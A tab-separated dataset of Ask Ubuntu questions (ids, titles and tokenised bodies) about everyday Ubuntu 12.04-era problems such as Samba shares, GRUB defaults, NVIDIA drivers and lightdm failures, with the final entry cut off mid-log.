156627	windows domain full hostnames can not be resolved resulting in intranet not working	the domain : is foo.bar.local full hostname is : bla.foo.bar.local short hostname is : bla i installed winbind . here is my smb.conf : name resolve order = lmhosts host wins bcast here is my nsswitch.conf : hosts : files mdns4_minimal [ notfound=return ] dns wins mdns4 when i try to ping full hostname , i get : `` ping : unknown host '' when i ping short hostname it works and shows me ping bla.foo.bar.local ( 10.11.20.135 ) 56 ( 84 ) bytes of data . 64 bytes from bla.foo.bar.local ( 10.11.20.135 ) : icmp_req=1 ttl=62 time=49.7 ms *notice that it manages to get the full hostname ! ? : s now the only reason i need it is cuz i 'm trying to reach intranet websites . when i type short hostname `` bla '' in firefox address bar , it automatically changes it to the full hostname ( which is good , right ? ! ) but then it says : server not found firefox ca n't find the server at bla.foo.bar.local . what am i doing wrong ? it 's driving me nutz . so if you are wandering then yes , it is company intranet i 'm trying to reach from ubuntu . if i use my crappy winxp everything is working perfectly well .
156634	ubuntu 12.04 , xerox workcenter 4118 , garbage printing	i am printing garbage ( like postscript ? % ! ps-adobe-3.0 ... ) since i have installed official driver for this printer , but when i install driver for xerox workcentre 7345 foomatic/ljet4 it works well but it prints everytime one page more with only content : '' reset '' . please help .
156635	can i install ubuntu 12.04 on macbook 6.1 ( late 2009 ) on my external hard drive ?	i have no experience in installing linux based os on macbook , but i already have windows installed on my mac . i read some articles saying i can have the lucid lynx installed in my macbook 6.1 and luckily i already got the cd ( which was distributed for free back then haha ) , my question is that can i have the 12.04 installed instead of the 10.04 and what do i need to do that ? i also would like to know can i install it on my external hard drive just like installing it on a usb stick ? i have viewed the how-to for installing the lucid lynx , is it just the same ? thanks in advance !
156640	why is my usb data transfer so slow ?	whenever i do any kind of file transfer using usb , whether to a usb stick , or with my android phone , or anything else , it is ridiculously slow . it says 59.8 kb/sec , which would be an awesome speed if this were 1991 and i was using a modem to dial up to my local bbs . surely usb technology is better than that ... ? 37 seconds to move less data than the equivelent of 1 mp3 file ? also , regardless of what it says about speed and time , the reality is much , much slower . i routinely see it say something like `` 37 seconds left '' and have to wait for minutes . sometimes , if i want to move large amounts of files , it can say it will take 8 hours or more . is this normal ? my computer may not be the most awesome on the market , and about a year old , but it 's an i5 with 4gb ram and modern components , so surely this is n't the hardware 's fault . what can i do to get better usb data transfer performance ? also , i did look at this question , but my newbie eyes do n't see anything that look like an actual solution , just a lot of discussion about what transfer rates could or should be . update : as requested in the comments , i 've generated a whole bunch of output from the command line , and put it on ubuntu pastebin . please see it here . i 've also posted the output from lsusb -t with my android phone connected ( which is the device i am most concerned about getting reasonable speeds with ) . update 2 : as requested in the comments , i removed everything except the mouse and keyboard , and then only attached one extra device at a time for testing . here is some output from dd : my sony video camera : $ dd if=/dev/zero of=/media/disk/testfile bs=128k count=800 conv=fdatasync 800+0 records in 800+0 records out 104857600 bytes ( 105 mb ) copied , 6.00824 s , 17.5 mb/s my android phone : $ dd if=/dev/zero of=/media/c3ad-13dc/testfile bs=128k count=800 conv=fdatasync 800+0 records in 800+0 records out 104857600 bytes ( 105 mb ) copied , 52.357 s , 2.0 mb/s the camera performed much better than usual , and while the phone was n't as bad as it has been ( about twice as fast as i 've ever seen ) , it 's still significantly slower than the camera .
156642	how to mount or bind a samba share ( specified by an ip address ) on a directory ?	from my ubuntu computer , i can access a network share in nautilus using the ip address prefixed with `` smb : // '' . for example , `` smb : //192.168.0.101 '' now , i would like to bind this share to a directory under home ( ~ ) . the mount command does not smb addresses . neither does the ln command .
156645	thunderbird font size varies with encoding in content-type header	i ca n't get thunderbird 13.0.1 to use proper font sizes for message text . i have configured all font settings to use ubuntu mono 16 , and set minimum font size to 16 . nevertheless , i get two different font sizes for message bodies depending on the encoding specified in the content-type header , both of them wrong . when the encoding is omitted , or when it is set to iso-8859-1 or us-ascii the message is displayed using a font that seems to be of size 12 or 13 . this font size is also used when composing new messages . when increasing the configured font size , the displayed text increases size and seems to stay about 3 or 4 units below the one i set . when the encoding is set to utf-8 , the message is displayed using a very tiny font , size 8 or 9 . this is close to unreadable . the font size used for such messages are constant , and does not change when i modify the configuration for fonts or minimum font size . i had similar problems with earlier versions of thunderbird , but it has gotten a lot worse after the last update , with the font size for utf-8 messages refusing to increase above the unreadable . is there any way to circumvent this annoying problem ?
156650	apt-get update very slow , stuck at `` waiting for headers ''	i have looked at similar questions : stuck at 0 % [ waiting for headers ] ( apt ) apt-get update stuck on `` waiting for headers '' however neither one of them answer my problem . i am running 12.04 amd64 and have recently started getting an issue that when i update my repos from my connection at home through a terminal , using sudo apt-get update , it takes forever ( literally after 2 hours it was at 28 % ) , however when i run from a different location it takes less than 5 minutes to complete . i have attempted changing which mirror i use but that does not solve the issue . i have also cut down what is in my sources list but this also makes no difference . there are no faults on my adsl line as i have already contacted my isp to check this . it also makes no difference if i use a wifi or network cable connection . what could be my issue ? a speed test ( www.speedtest.net ) comes out at about 0.9 mbps down and 0.42 mbps up ( which is a shade under the advertised line speed ) , i reside in south africa and use the uct leg server . but i have also tried the other mirrors available in sa ... .none of them make a difference .
156653	ubuntu software centre and update manager is not working	when i entered sudo apt-get update in terminal after some time its showing e : the package lists or status files could not be parsed or opened . so what can i do now ?
156656	my gnome 3 in ubuntu 11.10 is not showing any applications in applications menu ?	my gnome 3 in ubuntu 11.10 is not showing any applications in applications menu . it is presenting blank menu and showing no applications . what should i do to recover my application shortcuts in applications menu of gnome .
156657	why does n't autocomplete work after typing the `` su '' command ?	i have had a few times when autocomplete does n't seem to be there when pressing the tab button . i can recreate this easy by typing `` su '' then not being able to auto complete anything after the root bash prompt comes up . i was just wondering why this is the case and what can i do to enable it ?
156658	customizing shortcuts of firefox	as you can see , i have so many question about customizing firefox . i wonder how i can set shortcuts used in firefox . are there any extensions for this purpose ? in advance level , how can i customize firefox shortcuts ?
156660	gnome-shell and compiz	i was using ubuntu 2d till now along with compiz . now i installed gnome-shell and after that compiz effects are not working . is there any way to get compiz effects to work , else is there any other similar packages ?
156663	unable to install nvidia drivers on ubuntu 12.04	i am trying to install nvidia drivers on sony vaio e series with nvidia geforce when i try to instal additional drivers its coming like unable to download . for more options see /var/log/jockey.log like this ... can any one help me out .
156667	how to unmount after using mount -- bind option ?	i have mounted a hard disk /dev/sda1 on /media/backup . further , i have issued the following command : mkdir /home/users/desktop/backup sudo mount -- bind /media/backup /home/users/desktop/backup this allows me to access /media/backup from /home/users/desktop/backup as well . however , now i would like to remove the -- bind from /home/users/desktop/backup . how should i go about doing this correctly ? do i simply remove the /home/users/desktop/backup directory ? or should i be using umount ?
156670	why does n't bluetooth work on my sony vaio ?	specifications : platform 2nd generation intel® core™ i5 processor chipset intel® hm65 express chipset cpu intel® core™ i5-2430m processor graphic card name intel® hd graphics 3000 wifi atheros 9285
156671	error 5 input/output when trying to install ubuntu 12.04	i am using lenova laptop without cd drive . i tried to install ubuntu 12.04 through usb stick . after completing around 20 % or 22 % i got error like this `` error 5 input/output '' please help me , i am struggling for more than a week . please help me . thanks no . its not working . again it shows the same error . please help . and also i dont know how to partition the harddisk . if i tried to add partition . it shows `` no root is defined ... .. ''
156672	how to remove xp and install ubuntu	i 'm writing this for my friend , because he asked me 'cause my english is better than his . he wants to remove xp from his system , and install ubuntu 12.04 . he has a lot of data which he would like to copy . he has no usb-stick only a cd-drive . his system is p3 with 1 gigabyte ram and agp video card . he wants to know how to get his data , and how to backup the software and then install ubuntu . thanks for help
156676	unable to 'apply ' settings to nvidia x server settings	im unable to save any settings to nvidia server settings . i did 'save to x configuration file ' but no effect . enable xinerama is still unchecked the next time i start x. . original image here .
156679	how to make an asus g75 laptop more energy savvy	i just bought an asus g75 and the battery is lasting less than 2 hours , even when doing nothing . i read somewhere that energy saving is not efficient on linux , at least by default . is there something i can do to improve this ? thanks
156685	how do i find the dependencies for a program before trying to compile it ?	i was trying to cross-compile a program for arm . while compiling i was very much irritated as i had to look for a number of dependencies e.g fatal error : abc/xyz.h : no such file or directory compilation terminated . after ensuring that compiler gets the missing files , when i recompiled , i got same error for about 30 files . i have no idea if that is normal behaviour . if it is normal , is there a method which can help the compiler find the dependencies on its own ? if that is not normal , then please explain what i 'm doing wrong .
156688	installing spark on ubuntu	i am installing spark im client for ubuntu . the tar.gz does n't appear to be functional at all , ( considering the /bin directory is completely empty and lacks important things like unpack200 ) but i have a .deb for 2.6.0 . it 's not the latest version , but it 'll do . the issue is , i ca n't satisfy its dependency for sun-java6-jre . i 'm fairly certain using openjdk will work , i just need the deb to go through . how can i fix this ? can i install a dummy sun-java6-jre package somehow , then use openjdk ? or is there a way to actually install sun-java6-jre even after all this craziness of ubuntu removing sun/oracle java from their repositories ?
156690	how do i stop ubuntu precise freezing/hanging	at least once a day i lose work on my ( 2 different ) intel i5 machines running ubuntu 12.04 . the entire system will freeze/lock-up/hang , and never return . at this point nothing works ; even the caps lock key does n't toggle the light on the keyboard ; ctrl-alt-f1 wo n't do anything either . askubuntu.com is apparently where i 'm directed for support . i suspect this is a kernel bug . but i simply ca n't keep losing work like this , so i 'm anxious to try whatever it takes to get the thing reliably working . can you suggest something i can try to fix the problem an existing bug i can follow progress on and contribute to ( from users/tester 's pov ) the most constructive way i can contribute to helping fix the problem , keeping in mind that i do need the computer ( so ca n't do things that might `` brick '' it ! )
156695	how to format/align conky 's configuration file ?	my current conky config file looks like below and i find it pretty ugly . text temp : $ { color e0e0e0 } $ { acpitemp } $ { color } | uptime : $ { color e0e0e0 } $ { uptime_short } $ { color } | cpu : $ { color e0e0e0 } $ { cpu } % $ { color } ram : $ { color e0e0e0 } $ { mem } $ { color } swap : $ { color e0e0e0 } $ { swapperc } % $ { color } disk : $ { color e0e0e0 } $ { fs_used_perc / } % $ { color } now when i try changing it to the below format it disturbs my conky 's layout . text temp : $ { color e0e0e0 } $ { acpitemp } $ { color } | uptime : $ { color e0e0e0 } $ { uptime_short } $ { color } | cpu : $ { color e0e0e0 } $ { cpu } % $ { color } ram : $ { color e0e0e0 } $ { mem } $ { color } swap : $ { color e0e0e0 } $ { swapperc } % $ { color } disk : $ { color e0e0e0 } $ { fs_used_perc / } % $ { color } currently after changing now you can see as soon as i change my config file 's format it changes my conky 's layout . so , my question is there any way through which i can keep my current conky layout but format/align my config file 's text in a better way so that it is easy to understand and edit .
156700	how to set default boot kernel in ubuntu / grub ?	i wish to set my installation of ubuntu server 11.10 to automatically boot into linux kernel 2.6 . the way i navigate to this option in the grub menu is by choosing the 3rd option , which says `` older linux versions '' . this then loads another menu which has the linux 2.6 kernel versions of ubuntu that i am looking for . how to set up grub so that it boots into the linux 2.6 kernel automatically every time ? since the option for `` other linux versions '' is on line 3 of the grub menu , i changed the line in the /etc/default/grub file from default 0 to default 2 , but this did not seem to work . thanks !
156707	`` no launchpad project set '' - quickly	i want to get a project on launchpad using quickly , but if i run quickly submitubuntu it just tells me that no launchpad project set , leave blank to abort.. if i enter the name of my project he tells me that there is no project .
156708	how to get multimedia keys working at my asus n56vz ubuntu 12.04 notebook	i do n't get my multimedia keys ( fn keys ) working . the notebook is a asus n56vz . if i normally press the multimedia key combinations , nothing happens . if i try to get the keycodes while pressing , for e. g. , fn+f8 ( this should turn volume up ) with xev or acpi_listen started , there is no output at all . only the fn+f1 ( standby ) and the fn+f2 ( wireless on/off ) combinations are working , but also , there is no output at xev or acpi_listen , while doing this . what can i do here ?
156712	what does ctrl + alt + f11 do and why ca n't i log into my account with unity anymore ?	i was just happily typing away , trying out some android dev on my ubuntu machine , i pressed ctrl + alt + f11 instead of ctrl + f11 to run the program in eclipse . this made the screen go blank with a white flashing cursor and it stayed like that for a while , so i pressed ctrl + alt + f4 to get to a terminal i could use and remembered seeing somewhere startx to start the gui again so i tried that and had something i have also been trying commands like unity , unity start and unity restart but they all seem to run but i never get my gui back . now what is strange about the whole thing is the fact that it only happened to my user account , if i use guest i can access the gui but if i try and log in to my account the screen goes black for a few seconds and then sends be back to the log in screen . i have tried installing the xubuntu desktop over the top of it but it does the same thing with that desktop as well . my knowledge of linux is starting to get stretched at this point now . does anyone know what may have happened and how to put it right ? maybe its a user setting or something i could change ? also could anyone tell me what ctrl + alt and f11 does ? thanks for the time . oh and before i forget im using the latest version of ubuntu , ran the latest updates today as well . when running startx i get an error saying : fatal server error @ server is already active for display 0 if this server is no longer running , remove /temp/.x0-lock and start again another thing i have tried is using ctrl + alt + f7 to bring back the gui but that does n't seem to help either , it always sends me back to the log in screen ( which is the gui log in screen )
156713	change desktop background from terminal	i need to change the background of my desktop in ubuntu 12 . 04 with a command in terminal , in order to make a script with bash . does anyone know how to do it ?
156714	clicking on active apps on unity launcher stopped working	i do n't know how it suddenly became this but here 's what 's happening right now : e.g . i have 2 firefox windows open , so i see 2 small arrows on the left side icon of the unity launcher . before , when i click on the firefox icon , i see 2 small windows of the firefox so i can choose which one . now it suddenly stopped working . ( super+w still works though ) . the bug on my system applies to all progams with multiple window instances like nautilus , terminal , etc . please help , i do n't know what to do . i also have cairo dock , compiz , myunity installed in my 12.04 . i tried searching online to no avail .
156715	can i specify tighter security group controls in ec2 ?	i see juju creates a new security group when we do a bootstrap , but this security group is so open that it allows all the machine inside the group to access all the ports . is it possible to create a restricted security group or is there an option/parameter in environment.yaml file to specify that ?
156718	ubuntu 12.04 freezes during install on compaq presario v2000	i am trying to upgrade an older compaq presario v2000 from ubuntu 10.04 to 12.04 . i had no problems installing 10.04 , but i 'm having some issues with the 12.04 install freezing . i downloaded the file from the website and made a bootable cd . when i boot up the computer to start the install , it shows the ubuntu logo and then eventually freezes on the logo . i re-downloaded the file again and made a startup disk with a usb jump drive instead . it also freezes on boot up of the 12.04 installation in the same spot . any suggestions ?
156720	ubuntu 12.04 issues internal error / system problem	i am having massive problems with ubuntu 12.04 . after starting ubuntu it takes maximum 20 seconds until the first error message shows up . i do n't have the possibility to report the problem as immediately a new error message would show up and so on . i installed ubuntu 12.04 new however the problems are still there . when i was using ubuntu 11.10 i did never have any error messages . can i somehow post a error report ( and how do i find it ) here so one can figure out what the reason for the errors is .
156723	nvidia-settings error : nvidia driver not in use	i have an asus with geforce gt520m cuda ( optimus ) and i am running kubuntu 12.04 , 64bit . i am trying to connect an external monitor through dvi and the monitor is not detected . nvidia settings dont show properly and each time i fire them up there is a warning message : `` you do not appear to be using the nvidia x driver . please , edit ... . '' ( you probably know it and heard of this before ) . i have googled a lot and i have tried some things out but no luck so far . is there a solution which has worked for someone out there ? if so , please be very specific about what i need to do since i am really not good at using the terminal and generally new to ubuntu . i can use the terminal only to copy-paste things . : ) thanks in advance to everyone ! ps . seems like some people dealt with this by fixing the nvidia settings problem but the instructions have never been clear enough for me to be able to understand .
156726	my desktop menu is hidden even after reboot	my clock and applications and everything from the top is gone aswell as seeing which windows are open from the bottom of homescreen . i know this will be simple but just cant do it .
156727	how to reset keyboard after running windows in vmware	each time i start windows xp in vmware-8.0.4 on my ubuntu 12.04 machine the keyboard status is corrupt . the super-key no longer works , all the icons in the dock show the shortcut tooltip , the right shift key no longer works ( althougt the left shift works fine ) . this persists till i logout and log back in . the vmware guest works just fine , it is the hosting environment . i use unity as desktop . running debian as guest does not trigger the problem . ideally there is a fix for this , but i 'll settle for a trick to reset the keyboard in unity to get back to a working environment . peter tillemans
156736	ca n't connect to windows 7 ad-hoc network	good day ! i have installed ubuntu 12.04 on my laptop and i need to have network connection on it . have a desktop pc , where i 've created ad-hoc wi-fi network ( windows 7 ) and ca n't connect to it . so , problem : i see my network in the list of networks to connect , but i cant connect to it because it 's grey color and not active ( ca n't click on it ) . could somebody help me to solve that problem ? thanks in advance !
156737	apache wont work after changing port	i am working with ubuntu 12.04 server 64-bit edition . i have intalled apache2 without any problems and i can see the `` it works '' message . and i can also access from other pc within the network . i want to host my website using home dsl , however i found out that my isp is blocking the port 80 , 25 ,110 so i changed the port to 8010 ( /etc/apache2/port.conf ) after this i am unable to get the `` it works '' web page . all it shows that `` not found '' i tried with ipaddress:8010 and it doesnot work with both internal and also external .
156739	can not connect ubuntu to windows pc either direction	new to ubuntu and really struggling with this . i want to connect to my old windows xp pc on our home network . searching for solutions gets complicated as at one level you are told use connect to server . i set to windows share , type in server ip address.. ... i get `` failed to retrieve share list from server '' demo on youtube worked with no problem . other advice in ask ubuntu is you need to install samba . did that but nothing seems to happen when i try and run it other than it asking for admin password . ( how do you tell what is running on ubuntu ? ) so i try the other direction windows xp to ubuntu . i made the ubuntu directory within home frank shared and tried various combination such as \ipaddress\home\frank but just `` the folder you entered does not appear to be valid . please choose another . '' my entire data only drive is shared in windows and no problems accessing that from other win xp boxes on our network there are no alerts in windows firewall , ubuntu firestarter did block but changed that to allowed ... or so i thought . in firestarter i had set up inbound traffic policy 192.168.1.1/24 . and since then it has added the ip address of the win pc twice . so , i am in a state of confusion not knowing where to turn next so thought ask ubuntu : )
156742	vga connection with ubuntu 12.04 32b problem	i want to connect my computer to my tv scree but my vga connection on my computer does n't work . there is no connection at all . do i need to install drivers or something . sorry i am new in ubuntu . i am using ubuntu 12.04 32bits on macbook pro core 2 duo t9300 2.50gh thanks .
156744	how can i install skype without ia32-libs ?	how can i install skype without ia32-libs ? the libraries provided by ia32-libs crash my 64-bit `` second life '' game .
156748	how to add the kill button in xfce4-panel 4.10.0 of xubuntu 12.10 ?	when i was using gnome 2 , i had the option of add a kill button on the panel , but on xfce4-panel 4.10.0 this button is not an option , i think it 's necessary add it manually , creating a new luncher . but how can i do that ? i do n't know which is the processes that should be used .
156755	how do i prevent byobu from duplicating text on all splits ?	recently i started using byobu , and i 'm having a problem with each split just being a duplicate of the original . whatever i type in one split appears in all of the others . i 'm also using byobu on another computer and do not have this problem . is this a bug or did i accidentally modify my setup somehow ? thanks ! edit : i should mention that i have deleted the .byobu folder , but to no avail .
156759	hd flash video lagging on lg r400	i 'm installing ubuntu on my friends laptop . an lg r400 with ati mobility radeon x2300 graphics drivers . on windows vista which runs pretty slow the hd flash videos 1080p on youtube vimeo and other places work with no problems , but on ubuntu i can not really play videos above 480p above that they are lagging . that annoys me because i know he will use them , and how am i supposed to convince him that ubuntu is the way to go if it can not play the videos that windows vista can ? unity 3d is working fine so i think the graphics drivers is working , and when i download the hd videos and play as mp4 in vlc they also work fine . lspci -nn | grep vga shows the following : 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati mobility radeon x2300 hope that someone can help me convince my friend that ubuntu is rocking !
156763	unable to accept user 's license agreement in eclipse ide	installed eclipse ide from the terminal in ubuntu 12.04 for android app development . i was now asked to download the required files from `` install new software '' in the ide itself where it asks me to accept the user 's licence agreement . i click on the radio button which says that i 'm accepting the agreement but the finish button does n't get highlighted and i 'm unable to click it ! any solutions ?
156765	adding a file to the list of startup applications	in windows , it 's possible to make files open at startup ( using the default program for opening the file ) by adding the files to the startup folder . however , in ubuntu , it is n't possible to drag a file onto the list of startup applications so that it runs at startup . is there another way to make a file open at startup , using the default program for opening that file ?
156771	run a script only at the very first boot	is there an idiomatic way in ubuntu to run a script only the first time a machine is booted ? ( ec2 ) .
156775	ubuntu application for audio to text ?	does anyone here know about a program that can decode audio to a text file ? i was unable to locate anything through the software center . i 'm trying to understand a video , but the guy speaks wayyyy too quickly ( english is n't his first language ) . if need be , i can download the video to decode it . and if there is no audio to text program , does anyone know of a program that can add subtitles to any video ( i do n't even know if that 's technically possible ) ?
156781	why does n't thunderbird appear in the application switcher ?	when i switch applications with [ alt+tab ] , i do n't see thunderbird as one of the options . also , and i assume it 's related , the thunderbird icon in the unity bar is n't coloured and does n't have the little triangle indicator that it is running , even though the inbox window is open . what is going on here ? does thunderbird have some different status ? is it related to the integration with the notifications thingy in the top panel ? is there some setting i can change that makes thunderbird more visible ( at the moment i have to use compiz-scale to see the inbox window . any help/explanation appreciated . thanks
156782	ca n't find upgrade to 12.04 , update manager does n't seem to detect it	update manager does n't seem to want to find the upgrade . i have tried `` update-manager -d '' `` do-release-upgrade '' is cd going to be my only route ?
156787	when completing the form at myapps.developer.ubuntu.com , should i change the suggested package name ?	i am wanting to upload my application to the ubuntu software center and noticed that the suggested package name looks like a windows file path , e.g . c : \myappname should i/does this need changing ? i am completing the form at myapps.developer.ubuntu.com ...
156789	update manager always downloading full cache information	i am using ubuntu 12.04 . every time my update manager not just getting the new changes and its grabbing complete information every time around 19 mb . i want the behavior just to grab just new things if i run sudo apt-get update . help me .
156792	monodevelop external console	ubuntu 12.04 . when i run monodevelop ( ide ) using native shell , unity , the monodevelop external console that appears during debugging is gnome-terminal . but if i use another window manager ( for instance i3wm ) , monodevelop external console is xterm . any workaround to make the ide 'think ' it is in gnome environment and make it use gnome-terminal ?
156793	ubuntu 12.04 installation terminated due to fatal error	i am trying to do this since along time now , i have windows 7 on my hdd but the boot loader seems to not work since i had already tried installing ubuntu once . how do i get the boot menu back ? also , i am trying to make a new installation but it gives error just before the installation ends , the erroe reads as : executing-grub-install-dev/sda/3-failed-fatal-error how do i solve this issue ?
156800	black login window & ubuntu logo disappeared - 11.10 with gnome 3	10 on my compaq laptop with nvidia on board graohics . the history since i dont like unity , i have installed gnome 3 on top of it . i was updating daily and was having a good time with my ubuntu ( was getting relieved from most of the linux bugs which used to irritate me long back ) . i have installed some shell extensions and last day i read about linux mint extensions and installed mgse using the info here . http : //maketecheasier.com/use-linux-mint-mgse-in-ubuntu/2011/11/22 it was working find , but during an update happened two day 's before , i got a prompt to confirm replacing my grub ( not very sure what it was ) or something like that.i went ahead since it was an update . the issue after this update , while booting , the background from the grub menu to the login page has becomeblack . there is no background at all and i am getting a black login page . i am able to login from there and everything looks fine after that . also , the ubuntu logo during booting is not at all getting displayed and it just shows a black empty screen there . i am very sad becasue of this and i removed all the mint mgse extensions and everything hoping this will comeback . but the screen is still black . please help me . i am pretty new to the technical side of linux and wont understand big technical language . thanks for your patience .
156805	does samba have a default password ?	$ smbpasswd old smb password : new smb password : retype new smb password : could not connect to machine 127.0.0.1 : nt_status_logon_failure one suggestion was to add the user to samba smbpasswd -a frank this brought up list of options , should it tell me user added ? samba quick start guide use smbadduser name : name but that gave command not found did that but when i retry to change password i get same error message . browsing around it suggests that this error message is that you did not enter old password , as it is a new install i presumed it to be blank and googling samba default password came up with 1234 as default password , so tried that in the old smb password ... same error .
156810	reduce interface size without increasing the resolution	the display of my laptop ca n't go beyond 1280x800 , so the interface ( like title , navigation or menu bars ) appears bulky if compared to higher resolutions ( or even win7 at the same resolution ) , stealing space from the contents . is it possible to have a `` slimmer '' interface without increasing the resolution ?
156811	proxy settings for ubuntu one on windows	i am trying to use ubuntu one behind an authenticating proxy at work on windows xp . i have ubuntu one 3.0.2 , but it does n't work , i do n't know if it is because it does not recognize the system proxy settings ( `` internet options '' on the windows control panel ) or because it does not know how to authenticate ( it does n't ask me for proxy user/password in any case ) . the result is that it wo n't login , when i can login with no problems on my ubuntu one under ubuntu 12.04 at home ( no proxies , though ) . i saw there is a controversial bug about proxy support in ubuntu one , but even though there seems to be a partial fix at least for the linux client , it is not clear whether that affects the windows client as well . the ubuntu one faq states that `` the 3.x version of the windows client will have proxy support '' , but that 's the current version and the one i 'm trying to use . is there anyone who could make it work on windows , or knows what 's the current status ? thank you in advance .
156812	is porting a game to ubuntu fine for the ubuntu app showdown ?	i created a mobile game for android and ios about months ago . i am porting it to desktop and would like to join the contest with it . is this ok ? my other question : is it okay to participate now or is it too late ?
156818	kubuntu can not login	when i try to login to kubuntu through the desktop mode , a warning that says `` can not enter home directory '' is shown , and it throws me back to the login page .
156819	about uninstallation of ubuntu to allow dual-boot	i had windows xp and windows 7 previously . i wanted to keep windows xp and replace windows 7 by ubuntu in a specific drive of hard disk . during installation of ubuntu i found option replace windows 7 by ubuntu and i did it . now i found that windows xp has also gone and ubuntu is occupying the area of whole hard disk . now i want to uninstall or format the hard disk because ubuntu is new to me and i am not comfortable with ubuntu only right now . i want to keep both windows xp and ubuntu . so how can i uninstall ubuntu or format hard disk ? ? please help ... .is the formatting is possible by inserting windows xp cd ? ? or is there any other way so that without uninstalling ubuntu i can also install windows xp ?
156821	can not connect to internet on 11.04 using bsnl evdo prithvi card	i can not connect to internet using bsnl evdo prithvi data card . went through some websites that offered help , installed wvdial package and tried again , but was unsuccessful . i have read that , ubuntu 11.04 automatically detects data card , you only need to configure `` network manager '' and it will work , i did exactly that , but the result is same . the os detects the data card , and the presence of network , but it can not login . i have read in some forums that ubuntu 11.04 does not have support for bsnl evdo prithvi , is it true ? i re-checked the `` user id '' and `` password '' . its working on windows . please help me fix this .
156827	how to switch a netbook desktop on 12.04 ?	i just installed ubuntu 12.04 on my laptop . my screen is quite small , and i think that the netbook desktop ( something like this ) would be better . is it possible to switch to netbook desktop on ubuntu 12.04 ? if so , how is that done ? ( or have i understood it all wrong ... ? )
156835	help with bash script	# ! /bin/bash if [ `` $ ( which gimp ) '' ! = `` '' ] then { if [ `` $ ( gimp -version ) '' ! = 2.8 ] then { sudo apt-get remove gimp sudo add-apt-repository ppa : otto-kesselgulasch/gimp sudo apt-get update sudo apt-get install gimp } else echo you already have gimp 2.8 fi } else { sudo add-apt-repository ppa : otto-kesselgulasch/gimp sudo apt-get update sudo apt-get install gimp } fi i am trying to make a gimp 2.8 installer in bash please help me ?
156838	how to change user account settings with lxde	how can i change my user account settings using ubuntu 12.04 and lxde ? up to now , i always have to log in manually , which i 'd like to avoid . yet , i 'm unable to find the corresponding sub-menu . kind regards , schlossblick
156844	how do i remove the python 2.7 i installed and roll back to 2.6 ?	by a series of errors , python 2.7 was installed over 2.6 within ubuntu 10.04 . both appear to be working , however many things are not ( yolk , freenx , easy_install , pip , etc ) . i believe the issue is that 2.7 is now seen as the default for python , but the os is still trying to use 2.6 . for example , when i try and run yolk , i get : user @ linuxbox : /usr/local/lib $ yolk -l traceback ( most recent call last ) : file `` /usr/local/bin/yolk '' , line 5 , in < module > from pkg_resources import load_entry_point file `` /usr/local/lib/python2.6/dist-packages/pkg_resources.py '' , line 2735 , in < module > working_set.require ( __requires__ ) file `` /usr/local/lib/python2.6/dist-packages/pkg_resources.py '' , line 690 , in require needed = self.resolve ( parse_requirements ( requirements ) ) file `` /usr/local/lib/python2.6/dist-packages/pkg_resources.py '' , line 588 , in resolve raise distributionnotfound ( req ) pkg_resources.distributionnotfound : yolk==0.4.3 is there a way to rip 2.7 out , and revert everything back to 2.6 ?
156846	will panasonic wf950 wireless on-ear headphones work with ubuntu ?	i just wondered if ( shot in the dark ) anyone knew if these wireless headphones would work with ubuntu ? i was thinking if the transmitter is usb then i might not get the drivers . does anyone have any ideas of a way i could find out without paying for them then finding out i ca n't use them ?
156849	ubuntu issue with lock screen	i have locked my screen withctrl+alt+l then login window appears . after some time , it goes away , and the screen goes black . so far , so good . the problem is that after a while it shows the window login again , as though the mouse had been touched for example . that is however not the case . what 's wrong ? ?
156850	how do you set requirements ( such as minimum length ) on passwords ?	is there any way to set up minimum passcode requirements , such as a minimum length , requirement of mixed case alphanumerics and at least 1 symbol in the passcode , and enforce that at passcode changes ?
156853	how can i move a terminal screen from one workspace to another ?	i tried to drag a terminal screen from one workspace to another , and it did n't work .
156855	lightdm dumps to tty . can not start gui interface when booting off harddrive , but can when booting off usb	when booting , lightdm dumps to tty . no gui interface works- this is after a fresh install of ubuntu 12.04 where the gui interface works when running off the usb . i have an nvidia corporation g98 [ quadro nvs 420 ] graphics card . after i call startx from the terminal it still does n't work . i get the following in the xorg.0.log : [ 327.718 ] ( -- ) nvidia ( 0 ) : memory : 262144 kbytes [ 327.718 ] ( -- ) nvidia ( 0 ) : videobios : 62.98.6f.00.07 [ 327.718 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 327.718 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 327.756 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on quadro nvs 420 at pci:3:0:0 [ 327.756 ] ( -- ) nvidia ( 0 ) : none [ 327.756 ] ( ee ) nvidia ( 0 ) : no display devices found for this x screen . [ 328.010 ] ( ii ) unloadmodule : `` nvidia '' [ 328.010 ] ( ii ) unloading nvidia [ 328.010 ] ( ii ) unloadmodule : `` wfb '' [ 328.010 ] ( ii ) unloading wfb [ 328.010 ] ( ii ) unloadmodule : `` fb '' [ 328.010 ] ( ii ) unloading fb [ 328.011 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 328.011 ] fatal server error : [ 328.011 ] no screens found /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting local x display [ +0.00s ] debug : x server :0 will replace plymouth [ +0.02s ] debug : using vt 7 [ +0.02s ] debug : activating vt 7 [ +0.02s ] debug : logging to /var/log/lightdm/x-0.log [ +0.02s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.02s ] debug : launching x server [ +0.02s ] debug : launching process 1074 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none [ +0.02s ] debug : waiting for ready signal from x server :0 [ +0.02s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.02s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +1.38s ] debug : process 1074 exited with return value 1 [ +1.38s ] debug : x server stopped [ +1.38s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +1.38s ] debug : releasing vt 7 [ +1.38s ] debug : stopping plymouth , x server failed to start [ +1.39s ] debug : display server stopped [ +1.39s ] debug : stopping display [ +1.39s ] debug : display stopped [ +1.39s ] debug : stopping x local seat , failed to start a display [ +1.39s ] debug : stopping seat [ +1.39s ] debug : seat stopped [ +1.39s ] debug : required seat has stopped [ +1.39s ] debug : stopping display manager [ +1.39s ] debug : display manager stopped [ +1.39s ] debug : stopping daemon [ +1.39s ] debug : exiting with return value 1 /var/log/lightdm/x-0.log x protocol version 11 , revision 0 build operating system : linux 2.6.24-31-server x86_64 ubuntu current operating system : linux oorn 3.2.0-23-generic # 